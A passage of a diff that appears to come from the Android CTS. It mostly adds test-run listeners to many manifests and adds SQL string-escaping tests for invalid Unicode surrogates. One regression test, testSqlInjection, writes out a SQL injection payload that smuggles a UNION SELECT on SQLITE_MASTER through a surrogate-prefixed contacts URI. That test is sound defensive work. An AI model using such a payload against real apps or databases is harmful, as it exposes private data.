+ cdm.removeOnMessageReceivedListener(MESSAGE_REQUEST_PING, listener)
+ }
+ }
+
+ @Test
+ fun test_sendMessage_requiresPermission() {
+ // Create a regular (not self-managed) association.
+ targetApp.associate(MAC_ADDRESS_A)
+ val associationId = cdm.myAssociations[0].id
+
+ // Attempts to call sendMessage without the
+ // USE_COMPANION_TRANSPORTS permission should lead to a SecurityException
+ // being thrown.
+ assertFailsWith(SecurityException::class) {
+ cdm.sendMessage(MESSAGE_REQUEST_PING, byteArrayOf(), intArrayOf(associationId))
+ }
+
+ // Same call with the USE_COMPANION_TRANSPORTS permissions should succeed.
+ withShellPermissionIdentity(Manifest.permission.USE_COMPANION_TRANSPORTS) {
+ cdm.sendMessage(MESSAGE_REQUEST_PING, byteArrayOf(), intArrayOf(associationId))
+ }
+ }
+}
diff --git a/tests/tests/companion/noservices/AndroidManifest.xml b/tests/tests/companion/noservices/AndroidManifest.xml
index f5c4b9d..a851ff4 100644
--- a/tests/tests/companion/noservices/AndroidManifest.xml
+++ b/tests/tests/companion/noservices/AndroidManifest.xml
@@ -23,6 +23,9 @@
android:targetPackage="android.companion.cts.noservices"
android:label="CompanionDeviceManager No-CompanionDeviceServices CTS tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<application>
diff --git a/tests/tests/companion/uiautomation/AndroidManifest.xml b/tests/tests/companion/uiautomation/AndroidManifest.xml
index 3603685..96355ff 100644
--- a/tests/tests/companion/uiautomation/AndroidManifest.xml
+++ b/tests/tests/companion/uiautomation/AndroidManifest.xml
@@ -27,6 +27,9 @@
android:targetPackage="android.companion.cts.uiautomation"
android:label="CompanionDeviceManager UiAutomation CTS tests">
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
<application>
diff --git a/tests/tests/contactsprovider/AndroidManifest.xml b/tests/tests/contactsprovider/AndroidManifest.xml
index 3e4f150..e8ee353 100644
--- a/tests/tests/contactsprovider/AndroidManifest.xml
+++ b/tests/tests/contactsprovider/AndroidManifest.xml
@@ -58,6 +58,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.contacts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java b/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
index d800206..39d798f 100644
--- a/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
+++ b/tests/tests/contactsprovider/src/android/provider/cts/contacts/ContactsContract_DirectoryTest.java
@@ -99,6 +99,17 @@
return -1;
}
+ public void testSqlInjection() throws Exception {
+ Cursor cursor = getContext()
+ .getContentResolver()
+ .query(Uri.parse("content://contacts/phones/filter/test\uD83D',1))))"
+ + " union select type,name,tbl_name,"
+ + "rootpage,sql from SQLITE_MASTER; --"),
+ new String[]{"starred", "number", "person",
+ "last_time_contacted", "number_key"}, null, null);
+ assertFalse(cursor.moveToFirst());
+ }
+
public void testQueryParameters() throws Exception {
// Test for content types.
assertEquals(Directory.CONTENT_TYPE, mResolver.getType(Directory.CONTENT_URI));
diff --git a/tests/tests/contactsproviderwipe/AndroidManifest.xml b/tests/tests/contactsproviderwipe/AndroidManifest.xml
index e0b10f3..deab721 100644
--- a/tests/tests/contactsproviderwipe/AndroidManifest.xml
+++ b/tests/tests/contactsproviderwipe/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.provider.cts.contactsproviderwipe">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/content/AndroidManifest.xml b/tests/tests/content/AndroidManifest.xml
index 329ce05..075834c 100644
--- a/tests/tests/content/AndroidManifest.xml
+++ b/tests/tests/content/AndroidManifest.xml
@@ -625,6 +625,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.cts"
android:label="CTS tests of android.content">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
<instrumentation android:name="android.content.pm.cts.TestPmInstrumentation"
diff --git a/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java b/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
index dcf9410..0a6bea6 100644
--- a/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
+++ b/tests/tests/content/src/android/content/res/cts/ResourceNameTest.java
@@ -16,11 +16,12 @@
package android.content.res.cts;
-import android.content.cts.R;
import android.content.res.Resources;
import android.test.AndroidTestCase;
import android.test.suitebuilder.annotation.SmallTest;
+import android.content.cts.R;
+
public class ResourceNameTest extends AndroidTestCase {
@SmallTest
diff --git a/tests/tests/database/AndroidManifest.xml b/tests/tests/database/AndroidManifest.xml
index d4c0b2a..f47753d 100644
--- a/tests/tests/database/AndroidManifest.xml
+++ b/tests/tests/database/AndroidManifest.xml
@@ -32,6 +32,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.database.cts"
android:label="CTS tests of android.database">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java b/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
index a35a6ac..cef5441 100644
--- a/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
+++ b/tests/tests/database/src/android/database/cts/DatabaseUtilsTest.java
@@ -75,6 +75,134 @@
super.tearDown();
}
+ public void testHighSurrogateStartInvalid() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testDoubleHighSurrogateStart() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uD83D");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighSurrogatePairInvalid() {
+ String expected = "name=''''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\'");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testValidSurrogate() {
+ String expected = "name='\uD83D\uDC00'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D" + "\uDC00");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testReversedSurrogate() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uDC00" + "\uD83D");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testValidDoubleSurrogate() {
+ String expected = "name='\uD83D\uDC00\uD8FF\uDC01'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uD8FF\uDC01");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testValidDoubleSurrogateWithStringMixed() {
+ String expected = "name='Joh\uD83D\uDC00nn\uD8FF\uDC01y'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Joh\uD83D\uDC00nn\uD8FF\uDC01y");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testInvalidDoubleSurrogateWithStringMixed() {
+ String expected = "name='Johnn\uD8FF\uDC01y'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Joh\uD83Dn\uDC00n\uD8FF\uDC01y");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogate() {
+ String expected = "name='\uD83D\uDC00'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uDC01");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogateWithString_AtEnd() {
+ String expected = "name='Johnny\uD83D\uDC00'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Johnny\uD83D\uDC00\uDC01");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogateWithString_AtMiddle() {
+ String expected = "name='Jo\uD83D\uDC00hnny'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Jo\uD83D\uDC00\uDC01hnny");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testHighLowLowSurrogateWithString_AtStart() {
+ String expected = "name='\uD83D\uDC00Johnny'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uD83D\uDC00\uDC01Johnny");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalid() {
+ String expected = "name=''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uDC00");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalidWholeString_AtEnd() {
+ String expected = "name='Johnny'";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Johnny\uDC00");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalidWholeString_AtStart() {
+ String expected = "name='Johnny'''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "\uDC00Johnny'");
+ assertEquals(expected, sb.toString());
+ }
+
+ public void testLowSurrogateInvalidWholeString_AtMiddle() {
+ String expected = "name='Johnny'''";
+ StringBuilder sb = new StringBuilder("name=");
+
+ DatabaseUtils.appendEscapedSQLString(sb, "Joh\uDC00nny'");
+ assertEquals(expected, sb.toString());
+ }
+
public void testAppendEscapedSQLString() {
String expected = "name='Mike'";
StringBuilder sb = new StringBuilder("name=");
diff --git a/tests/tests/deviceconfig/AndroidManifest.xml b/tests/tests/deviceconfig/AndroidManifest.xml
index b3790ea..eafb00a 100755
--- a/tests/tests/deviceconfig/AndroidManifest.xml
+++ b/tests/tests/deviceconfig/AndroidManifest.xml
@@ -31,6 +31,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.deviceconfig.cts"
android:label="CTS tests for DeviceConfig API">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/dpi/AndroidManifest.xml b/tests/tests/dpi/AndroidManifest.xml
index 79d32a3..5457d92 100644
--- a/tests/tests/dpi/AndroidManifest.xml
+++ b/tests/tests/dpi/AndroidManifest.xml
@@ -30,5 +30,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.dpi.cts"
android:label="CTS tests for DPI">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/dpi2/AndroidManifest.xml b/tests/tests/dpi2/AndroidManifest.xml
index 8562aa2f..28b5579 100644
--- a/tests/tests/dpi2/AndroidManifest.xml
+++ b/tests/tests/dpi2/AndroidManifest.xml
@@ -30,5 +30,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.dpi2.cts"
android:label="CTS tests for DPI">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/dreams/AndroidManifest.xml b/tests/tests/dreams/AndroidManifest.xml
index 71e2a68..1011f84 100644
--- a/tests/tests/dreams/AndroidManifest.xml
+++ b/tests/tests/dreams/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.dreams.cts"
android:label="CTS tests for the android.service.dreams package">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/drm/AndroidManifest.xml b/tests/tests/drm/AndroidManifest.xml
index 127705f..5d8bb7e 100644
--- a/tests/tests/drm/AndroidManifest.xml
+++ b/tests/tests/drm/AndroidManifest.xml
@@ -24,6 +24,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.drm.cts"
android:label="CTS tests of android.drm">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/effect/AndroidManifest.xml b/tests/tests/effect/AndroidManifest.xml
index eeeae51..5323fe6 100644
--- a/tests/tests/effect/AndroidManifest.xml
+++ b/tests/tests/effect/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.effect.cts"
android:label="CTS tests of android.media.effect component">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/gamemanager/AndroidManifest.xml b/tests/tests/gamemanager/AndroidManifest.xml
index e2dbbe0..8623cc8 100644
--- a/tests/tests/gamemanager/AndroidManifest.xml
+++ b/tests/tests/gamemanager/AndroidManifest.xml
@@ -44,5 +44,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.gamemanager.cts"
android:label="CTS tests of android Game Manager service">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/gameservice/AndroidManifest.xml b/tests/tests/gameservice/AndroidManifest.xml
index 29e5d19..26dcfd8 100644
--- a/tests/tests/gameservice/AndroidManifest.xml
+++ b/tests/tests/gameservice/AndroidManifest.xml
@@ -68,6 +68,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.gameservice.cts"
android:label="CTS tests for Android Game Service">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/graphics/AndroidManifest.xml b/tests/tests/graphics/AndroidManifest.xml
index 08ac518..c0ae49f 100644
--- a/tests/tests/graphics/AndroidManifest.xml
+++ b/tests/tests/graphics/AndroidManifest.xml
@@ -101,6 +101,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.graphics.cts"
android:label="CTS tests of android.graphics">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/hardware/AndroidManifest.xml b/tests/tests/hardware/AndroidManifest.xml
index 4512fe5..9660e87 100644
--- a/tests/tests/hardware/AndroidManifest.xml
+++ b/tests/tests/hardware/AndroidManifest.xml
@@ -129,6 +129,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hardware.cts"
android:label="CTS hardware tests">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/hibernation/AndroidManifest.xml b/tests/tests/hibernation/AndroidManifest.xml
index bf8d8d3..80ccd37 100644
--- a/tests/tests/hibernation/AndroidManifest.xml
+++ b/tests/tests/hibernation/AndroidManifest.xml
@@ -23,6 +23,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.hibernation.cts"
android:label="CTS tests of android.hibernation">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/icu/icu4c_testapp/AndroidManifest.xml b/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
index 134f265..c2051b4 100644
--- a/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
+++ b/tests/tests/icu/icu4c_testapp/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.icu4c.cts"
android:label="CTS tests for ICU4C">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
\ No newline at end of file
diff --git a/tests/tests/identity/AndroidManifest.xml b/tests/tests/identity/AndroidManifest.xml
index 31fb920..7dcb297 100644
--- a/tests/tests/identity/AndroidManifest.xml
+++ b/tests/tests/identity/AndroidManifest.xml
@@ -26,6 +26,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.security.identity.cts"
android:label="CTS tests of android.security.identity.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/jni/AndroidManifest.xml b/tests/tests/jni/AndroidManifest.xml
index 0a773bd..4a534db 100644
--- a/tests/tests/jni/AndroidManifest.xml
+++ b/tests/tests/jni/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.jni.cts"
android:label="CTS tests of calling native code via JNI">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/jvmti/attaching/AndroidManifest.xml b/tests/tests/jvmti/attaching/AndroidManifest.xml
index c47ad83..9e61bcd 100644
--- a/tests/tests/jvmti/attaching/AndroidManifest.xml
+++ b/tests/tests/jvmti/attaching/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.jmvti.attaching.cts"
android:label="CTS tests for attaching jvmti agents from inside the app">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/keystore/AndroidManifest.xml b/tests/tests/keystore/AndroidManifest.xml
index 447c726..f97fd16 100644
--- a/tests/tests/keystore/AndroidManifest.xml
+++ b/tests/tests/keystore/AndroidManifest.xml
@@ -28,6 +28,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.keystore.cts"
android:label="CTS tests of android.keystore.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libcoreapievolution/AndroidManifest.xml b/tests/tests/libcoreapievolution/AndroidManifest.xml
index d7c4395..f89f5fd 100644
--- a/tests/tests/libcoreapievolution/AndroidManifest.xml
+++ b/tests/tests/libcoreapievolution/AndroidManifest.xml
@@ -25,6 +25,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.apievolution.cts"
android:label="CTS tests for required method signatures on device">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libcorefileio/AndroidManifest.xml b/tests/tests/libcorefileio/AndroidManifest.xml
index c6a95b5..7ef7c14 100644
--- a/tests/tests/libcorefileio/AndroidManifest.xml
+++ b/tests/tests/libcorefileio/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.libcorefileio.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/libcorelegacy22/AndroidManifest.xml b/tests/tests/libcorelegacy22/AndroidManifest.xml
index fb82240..98478e4 100644
--- a/tests/tests/libcorelegacy22/AndroidManifest.xml
+++ b/tests/tests/libcorelegacy22/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.libcorelegacy22.cts"
android:label="CTS tests of android APIs last available in API 22">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libnativehelper/AndroidManifest.xml b/tests/tests/libnativehelper/AndroidManifest.xml
index f2ec251..01f1c5e 100644
--- a/tests/tests/libnativehelper/AndroidManifest.xml
+++ b/tests/tests/libnativehelper/AndroidManifest.xml
@@ -24,5 +24,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.libnativehelper.cts"
android:label="CTS tests of android.libnativehelper">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/libthermalndk/AndroidManifest.xml b/tests/tests/libthermalndk/AndroidManifest.xml
index c4521a1..eb6eb22 100644
--- a/tests/tests/libthermalndk/AndroidManifest.xml
+++ b/tests/tests/libthermalndk/AndroidManifest.xml
@@ -24,5 +24,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.thermal.cts"
android:label="CTS Thermal tests of android.thermal" >
+ <meta-data
+ android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/match_flags/AndroidManifest.xml b/tests/tests/match_flags/AndroidManifest.xml
index 905861e..2878bd5 100644
--- a/tests/tests/match_flags/AndroidManifest.xml
+++ b/tests/tests/match_flags/AndroidManifest.xml
@@ -27,6 +27,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.matchflags.cts"
android:label="CTS tests for match flags">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/media/audio/AndroidManifest.xml b/tests/tests/media/audio/AndroidManifest.xml
index d0ca9ea..0681108 100644
--- a/tests/tests/media/audio/AndroidManifest.xml
+++ b/tests/tests/media/audio/AndroidManifest.xml
@@ -53,6 +53,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.audio.cts"
android:label="CTS tests of android.media.audio">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/codec/AndroidManifest.xml b/tests/tests/media/codec/AndroidManifest.xml
index 9b6d960..383a03a 100644
--- a/tests/tests/media/codec/AndroidManifest.xml
+++ b/tests/tests/media/codec/AndroidManifest.xml
@@ -55,6 +55,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.codec.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/decoder/AndroidManifest.xml b/tests/tests/media/decoder/AndroidManifest.xml
index 6e627cd..d25d904 100644
--- a/tests/tests/media/decoder/AndroidManifest.xml
+++ b/tests/tests/media/decoder/AndroidManifest.xml
@@ -50,6 +50,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.decoder.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/drmframework/AndroidManifest.xml b/tests/tests/media/drmframework/AndroidManifest.xml
index 64bd305..fd146bd 100644
--- a/tests/tests/media/drmframework/AndroidManifest.xml
+++ b/tests/tests/media/drmframework/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.drmframework.cts"
android:label="CTS tests of android MediaDrm">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/encoder/AndroidManifest.xml b/tests/tests/media/encoder/AndroidManifest.xml
index cddc623..b6d56f3 100644
--- a/tests/tests/media/encoder/AndroidManifest.xml
+++ b/tests/tests/media/encoder/AndroidManifest.xml
@@ -38,6 +38,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.encoder.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/extractor/AndroidManifest.xml b/tests/tests/media/extractor/AndroidManifest.xml
index 4f59705..82f45b9 100644
--- a/tests/tests/media/extractor/AndroidManifest.xml
+++ b/tests/tests/media/extractor/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.extractor.cts"
android:label="CTS tests of android MediaExtractor">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/misc/AndroidManifest.xml b/tests/tests/media/misc/AndroidManifest.xml
index f831ab1..08db1d4 100644
--- a/tests/tests/media/misc/AndroidManifest.xml
+++ b/tests/tests/media/misc/AndroidManifest.xml
@@ -82,6 +82,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.misc.cts"
android:label="CTS tests of android.media">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/muxer/AndroidManifest.xml b/tests/tests/media/muxer/AndroidManifest.xml
index 7232c2c..f914229 100644
--- a/tests/tests/media/muxer/AndroidManifest.xml
+++ b/tests/tests/media/muxer/AndroidManifest.xml
@@ -33,6 +33,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.muxer.cts"
android:label="CTS tests of android MediaMuxer">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/player/AndroidManifest.xml b/tests/tests/media/player/AndroidManifest.xml
index 51c7f5f..a43fffc 100644
--- a/tests/tests/media/player/AndroidManifest.xml
+++ b/tests/tests/media/player/AndroidManifest.xml
@@ -59,6 +59,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.player.cts"
android:label="CTS tests of android MediaPlayer">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/media/recorder/AndroidManifest.xml b/tests/tests/media/recorder/AndroidManifest.xml
index c102781..28ddf67 100644
--- a/tests/tests/media/recorder/AndroidManifest.xml
+++ b/tests/tests/media/recorder/AndroidManifest.xml
@@ -37,6 +37,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.recorder.cts"
android:label="CTS tests of android MediaRecorder">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/mediaparser/AndroidManifest.xml b/tests/tests/mediaparser/AndroidManifest.xml
index a457dc3..f0f6d97 100644
--- a/tests/tests/mediaparser/AndroidManifest.xml
+++ b/tests/tests/mediaparser/AndroidManifest.xml
@@ -28,5 +28,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.mediaparser.cts"
android:label="Tests for MediaParser.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/mediastress/AndroidManifest.xml b/tests/tests/mediastress/AndroidManifest.xml
index 1e6f1ba..9f717fc 100644
--- a/tests/tests/mediastress/AndroidManifest.xml
+++ b/tests/tests/mediastress/AndroidManifest.xml
@@ -49,6 +49,8 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.mediastress.cts"
android:label="Media stress tests InstrumentationRunner">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/mediatranscoding/AndroidManifest.xml b/tests/tests/mediatranscoding/AndroidManifest.xml
index 9c0b950..c69754a 100644
--- a/tests/tests/mediatranscoding/AndroidManifest.xml
+++ b/tests/tests/mediatranscoding/AndroidManifest.xml
@@ -34,5 +34,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.media.mediatranscoding.cts"
android:label="Tests for MediaTranscoding.">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
diff --git a/tests/tests/midi/AndroidManifest.xml b/tests/tests/midi/AndroidManifest.xml
index 036844d..186d1dd 100755
--- a/tests/tests/midi/AndroidManifest.xml
+++ b/tests/tests/midi/AndroidManifest.xml
@@ -41,5 +41,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:label="CTS MIDI tests"
android:targetPackage="android.midi.cts">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener"/>
</instrumentation>
</manifest>
diff --git a/tests/tests/mimemap/AndroidManifest.xml b/tests/tests/mimemap/AndroidManifest.xml
index bd2169f..ffb8a69 100644
--- a/tests/tests/mimemap/AndroidManifest.xml
+++ b/tests/tests/mimemap/AndroidManifest.xml
@@ -18,5 +18,7 @@
<instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
android:targetPackage="android.content.type.cts"
android:label="CTS MimeMap test cases">
+ <meta-data android:name="listener"
+ android:value="com.android.cts.runner.CtsTestRunListener" />
</instrumentation>
</manifest>
